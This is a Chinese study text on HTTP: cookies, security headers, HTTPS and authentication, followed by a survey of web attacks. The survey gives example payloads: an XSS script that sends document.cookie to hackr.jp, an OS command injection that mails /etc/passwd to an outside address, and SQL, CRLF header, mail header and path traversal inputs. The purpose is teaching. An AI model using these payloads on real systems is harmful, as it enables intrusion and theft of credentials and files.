以上例子仅当在 https://www.example.com/( HTTPS) 安全连接的情况下才会进行 Cookie 的回收。 也就是说, 即使域名相同,http://www.example.com/( HTTP) 也不会发生 Cookie 回收行为。当省略 secure 属性时, 不论 HTTP 还是HTTPS, 都会对 Cookie 进行回收。
HttpOnly 属性
Cookie 的 HttpOnly 属性是 Cookie 的扩展功能, 它使 JavaScript 脚本无法获得 Cookie。 其主要目的为防止跨站脚本攻击( Cross-site scripting, XSS) 对 Cookie 的信息窃取。
发送指定 HttpOnly 属性的 Cookie 的方法如下所示。

Set-Cookie: name=value; HttpOnly

通过上述设置, 通常从 Web 页面内还可以对 Cookie 进行读取操作。但使用 JavaScript 的 document.cookie 就无法读取附加 HttpOnly 属性后的 Cookie 的内容了。 因此, 也就无法在 XSS 中利用 JavaScript 劫持Cookie 了。
虽然是独立的扩展功能, 但 Internet Explorer 6 SP1 以上版本等当下的主流浏览器都已经支持该扩展了。 另外顺带一提, 该扩展并非是为了防止 XSS 而开发的。

Cookie: status=enable

首部字段 Cookie 会告知服务器, 当客户端想获得 HTTP 状态管理支持时, 就会在请求中包含从服务器接收到的 Cookie。 接收到多个Cookie 时, 同样可以以多个 Cookie 形式发送。

其他首部字段

X-Frame-Options

X-Frame-Options: DENY

首部字段 X-Frame-Options 属于 HTTP 响应首部, 用于控制网站内容在其他 Web 网站的 Frame 标签内的显示问题。 其主要目的是为了防止点击劫持( clickjacking) 攻击。
DENY : 拒绝
SAMEORIGIN : 仅同源域名下的页面( Top-level-browsingcontext) 匹配时许可。 ( 比如, 当指定 http://hackr.jp/sample.html 页面为 SAMEORIGIN 时, 那么 hackr.jp 上所有页面的 frame 都被允许可加载该页面, 而 example.com 等其他域名的页面就不行了)

X-XSS-Protection

X-XSS-Protection: 1

首部字段 X-XSS-Protection 属于 HTTP 响应首部, 它是针对跨站脚本攻击( XSS) 的一种对策, 用于控制浏览器 XSS 防护机制的开关。首部字段 X-XSS-Protection 可指定的字段值如下:
0 : 将 XSS 过滤设置成无效状态
1 : 将 XSS 过滤设置成有效状态

DNT

首部字段 DNT 属于 HTTP 请求首部, 其中 DNT 是 Do Not Track 的简称, 意为拒绝个人信息被收集, 是表示拒绝被精准广告追踪的一种方法。
首部字段 DNT 可指定的字段值如下。
0 : 同意被追踪
1 : 拒绝被追踪
由于首部字段 DNT 的功能具备有效性, 所以 Web 服务器需要对 DNT做对应的支持。

P3P

P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"

首部字段 P3P 属于 HTTP 相应首部, 通过利用 P3P( The Platform for Privacy Preferences, 在线隐私偏好平台) 技术, 可以让 Web 网站上的个人隐私变成一种仅供程序可理解的形式, 以达到保护用户隐私的目的。

确保 Web 安全的HTTPS

在 HTTP 协议中有可能存在信息窃听或身份伪装等安全问题。 使用HTTPS 通信机制可以有效地防止这些问题。
HTTP 主要有这些不足, 例举如下:
- 通信使用明文( 不加密) , 内容可能会被窃听
- 不验证通信方的身份, 因此有可能遭遇伪装
- 无法证明报文的完整性, 所以有可能已遭篡改
这些问题不仅在 HTTP 上出现, 其他未加密的协议中也会存在这类问题。
除此之外, HTTP 本身还有很多缺点。 而且, 还有像某些特定的 Web服务器和特定的 Web 浏览器在实际应用中存在的不足( 也可以说成是脆弱性或安全漏洞) , 另外, 用 Java 和 PHP 等编程语言开发的Web 应用也可能存在安全漏洞。

HTTP+ 加密 + 认证 + 完整性保护=HTTPS

需要在 HTTP 上再加入加密处理和认证等机制。 我们把添加了加密及认证机制的 HTTP 称为 HTTPS( HTTP Secure) 。

HTTPS 是身披 SSL 外壳的 HTTP

HTTPS 并非是应用层的一种新协议。 只是 HTTP 通信接口部分用SSL( Secure Socket Layer) 和 TLS( Transport Layer Security) 协议代替而已。
通常, HTTP 直接和 TCP 通信。 当使用 SSL时, 则演变成先和 SSL通信, 再由 SSL和 TCP 通信了。 简言之, 所谓 HTTPS, 其实就是身披SSL协议这层外壳的 HTTP。
在采用 SSL后, HTTP 就拥有了 HTTPS 的加密、 证书和完整性保护这些功能。SSL是独立于 HTTP 的协议, 所以不光是 HTTP 协议, 其他运行在应用层的 SMTP 和 Telnet 等协议均可配合 SSL协议使用。 可以说 SSL是当今世界上应用最为广泛的网络安全技术。

HTTPS 采用混合加密机制

HTTPS 采用共享密钥加密和公开密钥加密两者并用的混合加密机制。 若密钥能够实现安全交换, 那么有可能会考虑仅使用公开密钥加密来通信。 但是公开密钥加密与共享密钥加密相比, 其处理速度要慢。
所以应充分利用两者各自的优势, 将多种方法组合起来用于通信。 在交换密钥环节使用公开密钥加密方式, 之后的建立通信交换报文阶段则使用共享密钥加密方式。

证明公开密钥正确性的证书

公开密钥加密方式还是存在一些问题的。 那就是无法证明公开密钥本身就是货真价实的公开密钥。 比如, 正准备和某台服务器建立公开密钥加密方式下的通信时, 如何证明收到的公开密钥就是原本预想的那台服务器发行的公开密钥。 或许在公开密钥传输途中, 真正的公开密钥已经被攻击者替换掉了。
为了解决上述问题, 可以使用由数字证书认证机构( CA, Certificate Authority) 和其相关机关颁发的公开密钥证书。
数字证书认证机构处于客户端与服务器双方都可信赖的第三方机构的立场上。 威瑞信( VeriSign) 就是其中一家非常有名的数字证书认证机构。 我们来介绍一下数字证书认证机构的业务流程。 首先, 服务器的运营人员向数字证书认证机构提出公开密钥的申请。 数字证书认证机构在判明提出申请者的身份之后, 会对已申请的公开密钥做数字签名, 然后分配这个已签名的公开密钥, 并将该公开密钥放入公钥证书后绑定在一起。
服务器会将这份由数字证书认证机构颁发的公钥证书发送给客户端,以进行公开密钥加密方式通信。 公钥证书也可叫做数字证书或直接称为证书。
接到证书的客户端可使用数字证书认证机构的公开密钥, 对那张证书上的数字签名进行验证, 一旦验证通过, 客户端便可明确两件事:一, 认证服务器的公开密钥的是真实有效的数字证书认证机构。 二,服务器的公开密钥是值得信赖的。
此处认证机关的公开密钥必须安全地转交给客户端。 使用通信方式时, 如何安全转交是一件很困难的事, 因此, 多数浏览器开发商发布版本时, 会事先在内部植入常用认证机关的公开密钥。
HTTPS访问过程保证安全

HTTPS 的安全通信机制

HTTPS 的安全通信机制
步骤 1: 客户端通过发送 Client Hello 报文开始 SSL通信。 报文中包含客户端支持的 SSL的指定版本、 加密组件( Cipher Suite) 列表( 所使用的加密算法及密钥长度等) 。
步骤 2: 服务器可进行 SSL通信时, 会以 Server Hello 报文作为应答。 和客户端一样, 在报文中包含 SSL版本以及加密组件。 服务器的加密组件内容是从接收到的客户端加密组件内筛选出来的。
步骤 3: 之后服务器发送 Certificate 报文。 报文中包含公开密钥证书。
步骤 4: 最后服务器发送 Server Hello Done 报文通知客户端, 最初阶段的 SSL握手协商部分结束。
步骤 5: SSL第一次握手结束之后, 客户端以 Client Key Exchange 报文作为回应。 报文中包含通信加密中使用的一种被称为 Pre-master secret 的随机密码串。 该报文已用步骤 3 中的公开密钥进行加密。
步骤 6: 接着客户端继续发送 Change Cipher Spec 报文。 该报文会提示服务器, 在此报文之后的通信会采用 Pre-master secret 密钥加密。
步骤 7: 客户端发送 Finished 报文。 该报文包含连接至今全部报文的整体校验值。 这次握手协商是否能够成功, 要以服务器是否能够正确解密该报文作为判定标准。
步骤 8: 服务器同样发送 Change Cipher Spec 报文。
步骤 9: 服务器同样发送 Finished 报文。
步骤 10: 服务器和客户端的 Finished 报文交换完毕之后, SSL连接就算建立完成。 当然, 通信会受到 SSL的保护。 从此处开始进行应用层协议的通信, 即发送 HTTP 请求。
步骤 11: 应用层协议通信, 即发送 HTTP 响应。
步骤 12: 最后由客户端断开连接。 断开连接时, 发送 close_notify 报文。 上图做了一些省略, 这步之后再发送 TCP FIN 报文来关闭与 TCP的通信。
在以上流程中, 应用层发送数据时会附加一种叫做 MAC( Message Authentication Code) 的报文摘要。 MAC 能够查知报文是否遭到篡改, 从而保护报文的完整性。
下面是对整个流程的图解。 图中说明了从仅使用服务器端的公开密钥证书( 服务器证书) 建立 HTTPS 通信的整个过程。
HTTPS 通信的整个过程

HTTPS 比 HTTP 要慢 2 到 100 倍

SSL的慢分两种。 一种是指通信慢。 另一种是指由于大量消耗 CPU 及内存等资源, 导致处理速度变慢。和使用 HTTP 相比, 网络负载可能会变慢 2 到 100 倍。 除去和TCP 连接、 发送 HTTP 请求 • 响应以外, 还必须进行 SSL通信,因此整体上处理通信量不可避免会增加。另一点是 SSL必须进行加密处理。 在服务器和客户端都需要进行加密和解密的运算处理。 因此从结果上讲, 比起 HTTP 会更多地消耗服务器和客户端的硬件资源, 导致负载增强。针对速度变慢这一问题, 并没有根本性的解决方案, 我们会使用SSL加速器这种( 专用服务器) 硬件来改善该问题。 该硬件为SSL通信专用硬件, 相对软件来讲, 能够提高数倍 SSL的计算速度。 仅在 SSL处理时发挥 SSL加速器的功效, 以分担负载。
如果是非敏感信息则使用 HTTP 通信, 只有在包含个人信息等敏感数据时, 才利用 HTTPS 加密通信。
特别是每当那些访问量较多的 Web 网站在进行加密处理时, 它们所承担着的负载不容小觑。 在进行加密处理时, 并非对所有内容都进行加密处理, 而是仅在那些需要信息隐藏时才会加密, 以节约资源。

确认访问用户身份的认证

HTTP 使用的认证方式

BASIC 认证(基本认证)

步骤 1: 当请求的资源需要 BASIC 认证时, 服务器会随状态码 401Authorization Required, 返回带 WWW-Authenticate 首部字段的响应。该字段内包含认证的方式( BASIC) 及 Request-URI 安全域字符串( realm) 。
步骤 2: 接收到状态码 401 的客户端为了通过 BASIC 认证, 需要将用户 ID 及密码发送给服务器。 发送的字符串内容是由用户 ID 和密码构成, 两者中间以冒号( :) 连接后, 再经过 Base64 编码处理。假设用户 ID 为 guest, 密码是 guest, 连接起来就会形成 guest:guest 这样的字符串。 然后经过 Base64 编码, 最后的结果即是Z3Vlc3Q6Z3Vlc3Q=。 把这串字符串写入首部字段 Authorization 后,发送请求。
当用户代理为浏览器时, 用户仅需输入用户 ID 和密码即可, 之后,浏览器会自动完成到 Base64 编码的转换工作。
步骤 3: 接收到包含首部字段 Authorization 请求的服务器, 会对认证信息的正确性进行验证。 如验证通过, 则返回一条包含 Request-URI资源的响应。
BASIC 认证虽然采用 Base64 编码方式, 但这不是加密处理。 不需要任何附加信息即可对其解码。 换言之, 由于明文解码后就是用户 ID 和密码, 在 HTTP 等非加密通信的线路上进行 BASIC 认证的过程中, 如果被人窃听, 被盗的可能性极高。
另外, 除此之外想再进行一次 BASIC 认证时, 一般的浏览器却无法实现认证注销操作, 这也是问题之一。
BASIC 认证使用上不够便捷灵活, 且达不到多数 Web 网站期望的安全性等级, 因此它并不常用。

DIGEST 认证(摘要认证)

步骤 1: 请求需认证的资源时, 服务器会随着状态码 401 Authorization Required, 返 回带 WWW-Authenticate 首部字段的响应。该字段内包含质问响应方式认证所需的临时质询码( 随机数,nonce) 。
首部字段 WWW-Authenticate 内必须包含 realm 和 nonce 这两个字段的信息。 客户端就是依靠向服务器回送这两个值进行认证的。nonce 是一种每次随返回的 401 响应生成的任意随机字符串。 该字符串通常推荐由 Base64 编码的十六进制数的组成形式, 但实际内容依赖服务器的具体实现。
步骤 2: 接收到 401 状态码的客户端, 返回的响应中包含 DIGEST 认证必须的首部字段 Authorization 信息。首部字段 Authorization 内必须包含 username、 realm、 nonce、 uri 和 response 的字段信息。 其中, realm 和 nonce 就是之前从服务器接收到的响应中的字段。username 是 realm 限定范围内可进行认证的用户名。uri( digest-uri) 即 Request-URI 的值, 但考虑到经代理转发后 Request-URI 的值可能被修改, 因此事先会复制一份副本保存在 uri 内。response 也可叫做 Request-Digest, 存放经过 MD5 运算后的密码字符串, 形成响应码。
步骤 3: 接收到包含首部字段 Authorization 请求的服务器, 会确认认证信息的正确性。 认证通过后则返回包含 Request-URI 资源的响应。并且这时会在首部字段 Authentication-Info 写入一些认证成功的相关信息。
DIGEST 认证提供了高于 BASIC 认证的安全等级, 但是和 HTTPS 的客户端认证相比仍旧很弱。 DIGEST 认证提供防止密码被窃听的保护机制, 但并不存在防止用户伪装的保护机制。DIGEST 认证和 BASIC 认证一样, 使用上不那么便捷灵活, 且仍达不到多数 Web 网站对高度安全等级的追求标准。 因此它的适用范围也有所受限。

SSL 客户端认证

SSL客户端认证是借由 HTTPS 的客户端证书完成认证的方式。 凭借客户端证书认证, 服务器可确认访问是否来自已登录的客户端。
为达到 SSL客户端认证的目的, 需要事先将客户端证书分发给客户端, 且客户端必须安装此证书。
步骤 1: 接收到需要认证资源的请求, 服务器会发送 Certificate Request 报文, 要求客户端提供客户端证书。
步骤 2: 用户选择将发送的客户端证书后, 客户端会把客户端证书信息以 Client Certificate 报文方式发送给服务器。
步骤 3: 服务器验证客户端证书验证通过后方可领取证书内客户端的公开密钥, 然后开始 HTTPS 加密通信。
在多数情况下, SSL客户端认证不会仅依靠证书完成认证, 一般会和基于表单认证( 稍后讲解) 组合形成一种双因素认证( Two-factor authentication) 来使用。 所谓双因素认证就是指, 认证过程中不仅需要密码这一个因素, 还需要申请认证者提供其他持有信息, 从而作为另一个因素, 与其组合使用的认证方式。
换言之, 第一个认证因素的 SSL客户端证书用来认证客户端计算机,另一个认证因素的密码则用来确定这是用户本人的行为。
通过双因素认证后, 就可以确认是用户本人正在使用匹配正确的计算机访问服务器。

FormBase 认证(基于表单认证)

由于使用上的便利性及安全性问题, HTTP 协议标准提供的 BASIC 认证和 DIGEST 认证几乎不怎么使用。 另外, SSL客户端认证虽然具有高度的安全等级, 但因为导入及维持费用等问题, 还尚未普及。
一般会使用 Cookie 来管理Session( 会话) 。
步骤 1: 客户端把用户 ID 和密码等登录信息放入报文的实体部分,通常是以 POST 方法把请求发送给服务器。 而这时, 会使用 HTTPS 通信来进行 HTML表单画面的显示和用户输入数据的发送。
步骤 2: 服务器会发放用以识别用户的 Session ID。 通过验证从客户端发送过来的登录信息进行身份认证, 然后把用户的认证状态与Session ID 绑定后记录在服务器端。
向客户端返回响应时, 会在首部字段 Set-Cookie 内写入 Session ID( 如 PHPSESSID=028a8c…) 。
如果 Session ID 被第三方盗走, 对方就可以伪装成你的身份进行恶意操作了。 因此必须防止 Session ID 被盗, 或被猜出。 为了做到这点, Session ID 应使用难以推测的字符串, 且服务器端也需要进行有效期的管理, 保证其安全性。
另外, 为减轻跨站脚本攻击( XSS) 造成的损失, 建议事先在 Cookie内加上 httponly 属性。
步骤 3: 客户端接收到从服务器端发来的 Session ID 后, 会将其作为Cookie 保存在本地。 下次向服务器发送请求时, 浏览器会自动发送Cookie, 所以 Session ID 也随之发送到服务器。 服务器端可通过验证接收到的 Session ID 识别用户和其认证状态。
不仅基于表单认证的登录信息及认证过程都无标准化的方法,服务器端应如何保存用户提交的密码等登录信息等也没有标准化。通常, 一种安全的保存方法是, 先利用给密码加盐( salt) 的方式增加额外信息, 再使用散列( hash) 函数计算出散列值后保存。 但是我们也经常看到直接保存明文密码的做法, 而这样的做法具有导致密码泄露的风险。

基于 HTTP 的功能追加协议

Ajax( Asynchronous JavaScript and XML, 异 步 JavaScript 与 XML技术) 是一种有效利用 JavaScript 和 DOM( Document Object Model, 文档对象模型) 的操作, 以达到局部 Web 页面替换加载的异步通信手段。 和以前的同步通信相比, 由于它只更新一部分页面, 响应中传输的数据量会因此而减少, 这一优点显而易见。
Ajax 的核心技术是名为 XMLHttpRequest 的 API, 通过 JavaScript 脚本语言的调用就能和服务器进行 HTTP 通信。 借由这种手段, 就能从已加载完毕的 Web 页面上发起请求, 只更新局部页面。
而利用 Ajax 实时地从服务器获取内容, 有可能会导致大量请求产生。 另外, Ajax 仍未解决 HTTP 协议本身存在的问题。

Web 的攻击技术

针对 Web 的攻击技术

以服务器为目标的主动攻击

主动攻击( active attack) 是指攻击者通过直接访问 Web 应用,把攻击代码传入的攻击模式。 由于该模式是直接针对服务器上的资源进行攻击, 因此攻击者需要能够访问到那些资源。主动攻击模式里具有代表性的攻击是 SQL注入攻击和 OS 命令注
入攻击。

以服务器为目标的被动攻击

被动攻击( passive attack) 是指利用圈套策略执行攻击代码的攻击模式。 在被动攻击过程中, 攻击者不直接对目标 Web 应用访问发起攻击。
步骤 1: 攻击者诱使用户触发已设置好的陷阱, 而陷阱会启动发送已嵌入攻击代码的 HTTP 请求。
步骤 2: 当用户不知不觉中招之后, 用户的浏览器或邮件客户端就会触发这个陷阱。
步骤 3: 中招后的用户浏览器会把含有攻击代码的 HTTP 请求发送给作为攻击目标的 Web 应用, 运行攻击代码。
步骤 4: 执行完攻击代码, 存在安全漏洞的 Web 应用会成为攻击者的跳板, 可能导致用户所持的 Cookie 等个人信息被窃取,登录状态中的用户权限遭恶意滥用等后果。
被动攻击模式中具有代表性的攻击是跨站脚本攻击和跨站点请求伪造。
利用被动攻击, 可发起对原本从互联网上无法直接访问的企业内网等网络的攻击。 只要用户踏入攻击者预先设好的陷阱, 在用户能够访问到的网络范围内, 即使是企业内网也同样会受到攻击。很多企业内网依然可以连接到互联网上, 访问 Web 网站, 或接收互联网发来的邮件。 这样就可能给攻击者以可乘之机, 诱导用户触发陷阱后对企业内网发动攻击。

跨站脚本攻击

跨站脚本攻击( Cross-Site Scripting, XSS) 是指通过存在安全漏洞的 Web 网站注册用户的浏览器内运行非法的 HTML标签或 JavaScript 进行的一种攻击。 动态创建的 HTML部分有可能隐藏着安全漏洞。 就这样, 攻击者编写脚本设下陷阱, 用户在自己的浏览器上运行时, 一不小心就会受到被动攻击。
- 利用虚假输入表单骗取用户个人信息。
- 利用脚本窃取用户的 Cookie 值, 被害者在不知情的情况下,帮助攻击者发送恶意请求。
- 显示伪造的文章或图片。
XSS 是攻击者利用预先设置的陷阱触发的被动攻击。跨站脚本攻击属于被动攻击模式, 因此攻击者会事先布置好用于
攻击的陷阱。
充分熟知此处漏洞特点的攻击者, 于是就创建了下面这段嵌入恶意代码的 URL。 并隐藏植入事先准备好的欺诈邮件中或 Web 页面内, 诱使用户去点击该 URL。http://example.jp/login?ID=“>

var content = escape(document.cookie);document.write("<img src=http://hackr.jp/?");document.write(content);document.write(">");

在存在可跨站脚本攻击安全漏洞的 Web 应用上执行上面这段 JavaScript 程序, 即可访问到该 Web 应用所处域名下的 Cookie 信息。 然后这些信息会发送至攻击者的 Web 网站。

SQL 注入攻击

会执行非法 SQL 的 SQL 注入攻击
SQL注入( SQL Injection) 是指针对 Web 应用使用的数据库, 通过运行非法的 SQL而产生的攻击。 该安全隐患有可能引发极大的威胁, 有时会直接导致个人信息及机密信息的泄露。
SELECT * FROM bookTbl WHERE author =’上野宣’ - -’ and flag=1; SQL语句中的 – 之后全视为注释。 即, and flag=1 这个条件被自动忽略了。

OS 命令注入攻击

OS 命令注入攻击( OS Command Injection) 是指通过 Web 应用, 执行非法的操作系统命令达到攻击的目的。 只要在能调用 Shell 函数的地方就有存在被攻击的风险。
下面摘选处理该表单内容的一部分核心代码。

my $adr = $q->param('mailaddress');open(MAIL, "| /usr/sbin/sendmail $adr");print MAIL "From: info@example.com\n";

程序中的 open 函数会调用 sendmail 命令发送邮件, 而指定的邮件发送地址即 $adr 的值。
攻击者将下面的值指定作为邮件地址。

; cat /etc/passwd | mail hack@example.jp

程序接收该值, 构成以下的命令组合。

| /usr/sbin/sendmail ; cat /etc/passwd | mail hack@example.jp

攻击者的输入值中含有分号( ;) 。 这个符号在 OS 命令中, 会被解析为分隔多个执行命令的标记。
可见, sendmail 命令执行被分隔后, 接下去就会执行

cat /etc/passwd | mail hack@example.jp

这样的命令了。 结果, 含有Linux 账户信息 /etc/passwd 的文件, 就以邮件形式发送给了hack@example.jp。

HTTP 首部注入攻击

HTTP 首部注入攻击( HTTP Header Injection) 是指攻击者通过在响应首部字段内插入换行, 添加任意响应首部或主体的一种攻击。 属于被动攻击模式。
向首部主体内添加内容的攻击称为 HTTP 响应截断攻击( HTTP Response Splitting Attack) 。
攻击者以下面的内容替代之前的类别 ID 后发送请求。

101%0D%0ASet-Cookie:+SID=123456789

其中, %0D%0A 代表 HTTP 报文中的换行符, 紧接着的是可强制将攻击者网站( http://hackr.jp/) 的会话 ID 设置成
SID=123456789 的 Set-Cookie 首部字段。发送该请求之后, 假设结果返回以下响应。

Location: http://example.com/?cat=101( %0D%0A : 换行符)Set-Cookie: SID=123456789

此刻, 首部字段 Set-Cookie 已生效, 因此攻击者可指定修改任意的 Cookie 信息。 通过和会话固定攻击( 攻击者可使用指定的会话 ID) 攻击组合, 攻击者可伪装成用户。
攻击者输入的 %0D%0A, 原本应该属于首部字段 Location 的查询值部分, 但经过解析后, %0D%0A 变成了换行符, 结果插入了新的首部字段。
这样一来, 攻击者可在响应中插入任意的首部字段。
HTTP 响应截断攻击
HTTP 响应截断攻击是用在 HTTP 首部注入的一种攻击。 攻击顺序相同, 但是要将两个 %0D%0A%0D%0A 并排插入字符串后发送。 利用这两个连续的换行就可作出 HTTP 首部与主体分隔所需的空行了, 这样就能显示伪造的主体, 达到攻击目的。 这样的攻击叫做 HTTP 响应截断攻击。

%0D%0A%0D%0A<HTML><HEAD><TITLE>之后, 想要显示的网页内容 <!--

在可能进行 HTTP 首部注入的环节, 通过发送上面的字符串, 返回结果得到以下这种响应。

Set-Cookie: UID=( %0D%0A : 换行符)( %0D%0A : 换行符)<HTML><HEAD><TITLE>之后, 想要显示的网页内容 <!--( 原来页面对应的首部字段和主体部分全视为注释)

利用这个攻击, 已触发陷阱的用户浏览器会显示伪造的 Web 页面, 再让用户输入自己的个人信息等, 可达到和跨站脚本攻击相同的效果。

邮件首部注入攻击

邮件首部注入( Mail Header Injection) 是指 Web 应用中的邮件发送功能, 攻击者通过向邮件首部 To 或 Subject 内任意添加非法内容发起的攻击。 利用存在安全漏洞的 Web 网站, 可对任意邮件地址发送广告邮件或病毒邮件。
攻击者将以下数据作为邮件地址发起请求。

bob@hackr.jp%0D%0ABcc: user@example.com

%0D%0A 在邮件报文中代表换行符。 一旦咨询表单所在的 Web 应用接收了这个换行符, 就可能实现对 Bcc 邮件地址的追加发送, 而这原本是无法指定的。
另外像下面一样, 使用两个连续的换行符就有可能篡改邮件文本内容并发送。

bob@hackr.jp%0D%0A%0D%0ATest Message

再以相同的方法, 就有可能改写 To 和 Subject 等任意邮件首部,或向文本添加附件等动作。

目录遍历攻击

目录遍历( Directory Traversal) 攻击是指对本无意公开的文件目录,通过非法截断其目录路径后, 达成访问目的的一种攻击。 这种攻击有时也称为路径遍历( Path Traversal) 攻击。
通过 Web 应用对文件处理操作时, 在由外部指定文件名的处理存在疏漏的情况下, 用户可使用 …/ 等相对路径定位到 /etc/passed 等绝对路径上, 因此服务器上任意的文件或文件目录皆有可能被访问到。 这样一来, 就有可能非法浏览、 篡改或删除 Web 服务器上的文件。固然存在输出值转义的问题, 但更应该关闭指定对任意文件名的访问权限。

http://example.com/read.php?log=0401.log

攻击者设置如下查询字段后发出请求。

http://example.com/read.php?log=../../etc/passwd

查询字段为了读取攻击者盯上的 /etc/passwd 文件, 会从/www/log/ 目录开始定位相对路径。 如果这份 read.php 脚本接受
对指定目录的访问请求处理, 那原本不公开的文件就存在可被访问的风险。

远程文件包含漏洞

远程文件包含漏洞( Remote File Inclusion) 是指当部分脚本内容需要从其他文件读入时, 攻击者利用指定外部服务器的 URL充当依赖文件, 让脚本读取之后, 就可运行任意脚本的一种攻击。这主要是 PHP 存在的安全漏洞, 对 PHP 的 include 或 require 来说,这是一种可通过设定, 指定外部服务器的 URL作为文件名的功能。但是, 该功能太危险, PHP5.2.0 之后默认设定此功能无效。

因设置或设计上的缺陷引发的安全漏洞

因设置或设计上的缺陷引发的安全漏洞是指, 错误设置 Web 服务器, 或是由设计上的一些问题引起的安全漏洞。

强制浏览

强制浏览( Forced Browsing) 安全漏洞是指, 从安置在 Web 服务器的公开目录下的文件中, 浏览那些原本非自愿公开的文件。强制浏览有可能会造成以下一些影响。
- 泄露顾客的个人信息等重要情报
- 泄露原本需要具有访问权限的用户才可查阅的信息内容
- 泄露未外连到外界的文件
对那些原本不愿公开的文件, 为了保证安全会隐蔽其 URL。 可一旦知道了那些 URL, 也就意味着可浏览 URL对应的文件。 直接显示容易推测的文件名或文件目录索引时, 通过某些方法可能会使 URL产生泄露。

不正确的错误消息处理

不正确的错误消息处理( Error Handling Vulnerability) 的安全漏洞是指, Web 应用的错误信息内包含对攻击者有用的信息。 与 Web 应用有关的主要错误信息如下所示。
- Web 应用抛出的错误消息
- 数据库等系统抛出的错误消息
Web 应用抛出的错误消息
Web 应用不必在用户的浏览画面上展现详细的错误消息。 对攻击者来说, 详细的错误消息有可能给他们下一次攻击以提示。
提示“邮件地址未注册”的错误消息。 当输入的邮件地址尚未在该 Web 网站上注册时, 就会触发这条错误消息。 因为倘
若邮件地址存在, 应该会提示“输入的密码有误”之类的错误消息。攻击者利用进行不同的输入会提示不同的错误信息这条, 就可用来确认输入的邮件地址是否已在这个 Web 网站上注册过了。为了不让错误消息给攻击者以启发, 建议将提示消息的内容仅保留到“认证错误”这种程度即可。
数据库等系统抛出的错误消息
攻击者从消息中可读出数据库选用的是 MySQL, 甚至还看见了 SQL语句的片段。 这可能给攻击者进行 SQL注入攻击以启发。

开放重定向

开放重定向( Open Redirect) 是一种对指定的任意 URL作重定向跳转的功能。 而于此功能相关联的安全漏洞是指, 假如指定的重定向 URL到某个具有恶意的 Web 网站, 那么用户就会被诱导至那个 Web 网站。

http://example.com/?redirect=http://www.tricorder.jp

攻击者把重定向指定的参数改写成已设好陷阱的 Web 网站对应的 连接, 如下所示。

http://example.com/?redirect=http://hackr.jp

用户看到 URL后原以为访问 example.com, 不料实际上被诱导至 hackr.jp 这个指定的重定向目标。可信度高的 Web 网站如果开放重定向功能, 则很有可能被攻击者选中并用来作为钓鱼攻击的跳板。

因会话管理疏忽引发的安全漏洞

会话管理是用来管理用户状态的必备功能, 但是如果在会话管理上有所疏忽, 就会导致用户的认证状态被窃取等后果。

会话劫持

会话劫持( Session Hijack) 是指攻击者通过某种手段拿到了用户的会话 ID, 并非法使用此会话 ID 伪装成用户, 达到攻击的目的。

会话固定攻击

对以窃取目标会话 ID 为主动攻击手段的会话劫持而言, 会话固定攻击( Session Fixation) 攻击会强制用户使用攻击者指定的会话 ID, 属于被动攻击。
攻击者准备陷阱, 先访问 Web 网站拿到会话 ID( SID=f5d1278e8109) 。 此刻, 会话 ID 在服务器上的记录仍是( 未认证) 状态。 ( 步骤① ~ ②)
攻击者设置好强制用户使用该会话 ID 的陷阱, 并等待用户拿着这个会话 ID 前去认证。 一旦用户触发陷阱并完成认证, 会话
ID( SID=f5d1278e8109) 在服务器上的状态( 用户 A 已认证) 就会被记录下来。 ( 步骤③)
攻击者估计用户差不多已触发陷阱后, 再利用之前这个会话 ID 访问网站。 由于该会话 ID 目前已是( 用户 A 已认证) 状态, 于是攻击者作为用户 A 的身份顺利登录网站。 ( 步骤④)

跨站点请求伪造

跨站点请求伪造( Cross-Site Request Forgeries, CSRF) 攻击是指攻击者通过设置好的陷阱, 强制对已完成认证的用户进行非预期的个人信息或设定信息等某些状态更新, 属于被动攻击。
在该留言板系统上, 受害者用户 A 是已认证状态。 它的浏览器中的 Cookie 持有已认证的会话 ID( 步骤①) 。
攻击者设置好一旦用户访问, 即会发送在留言板上发表非主观行为产生的评论的请求的陷阱。 用户 A 的浏览器执行完陷阱中的请求后, 留言板上也就会留下那条评论( 步骤②) 。
触发陷阱之际, 如果用户 A 尚未通过认证, 则无法利用用户 A 的身份权限在留言板上发表内容。

其他安全漏洞

密码破解

  • 通过网络进行密码试错
    穷举法
    穷举法( Brute-force Attack, 又称暴力破解法) 是指对所有密钥集合构成的密钥空间( Keyspace) 进行穷举。 即, 用所有可行的候选密码对目标的密码系统试错, 用以突破验证的一种攻击。
    字典攻击
    字典攻击是指利用事先收集好的候选密码( 经过各种组合方式后存入字典) , 枚举字典中的密码, 尝试通过认证的一种攻击手法。
    还是举银行采用个人识别码是“4 位数字”的密码的例子, 考虑到用户使用自己的生日做密码的可能性较高, 于是就可以把生日日期数值化, 如将 0101~1231 保存成字典, 进行尝试。
  • 对已加密密码的破解
    Web 应用在保存密码时, 一般不会直接以明文的方式保存, 通过散列函数做散列处理或加 salt 的手段对要保存的密码本身加密。那即使攻击者使用某些手段窃取密码数据, 如果想要真正使用这些密码, 则必须先通过解码等手段, 把加密处理的密码还原成明文形式。
  • 通过穷举法·字典攻击进行类推
  • 彩虹表
  • 拿到密钥
  • 加密算法的漏洞
    为了提高攻击成功率, 拥有一张海量数据的彩虹表就成了必不可少的条件。 例如在 Free Rainbow Tables 网站上
    ( http://www.freerainbowtables.com/en/tables2/) 公布的一张由大小写字母及数字全排列的 1~8 位字符串对应的 MD5 散列值构成的彩虹表, 其大小约为 1050 吉字节。

点击劫持

点击劫持( Clickjacking) 是指利用透明的按钮或链接做成陷阱, 覆盖在 Web 页面之上。 然后诱使用户在不知情的情况下, 点击那个链接访问内容的一种攻击手段。 这种行为又称为界面伪装( UI Redressing) 。
已设置陷阱的 Web 页面, 表面上内容并无不妥, 但早已埋入想让用户点击的链接。 当用户点击到透明的按钮时, 实际上是点击了已指定透明属性元素的 iframe 页面。

DoS 攻击

DoS 攻击( Denial of Service attack) 是一种让运行中的服务呈停止状态的攻击。 有时也叫做服务停止攻击或拒绝服务攻击。 DoS 攻击的对象不仅限于 Web 网站, 还包括网络设备及服务器等。

后门程序

后门程序( Backdoor) 是指开发设置的隐藏入口, 可不按正常步骤使用受限功能。 利用后门程序就能够使用原本受限制的功能。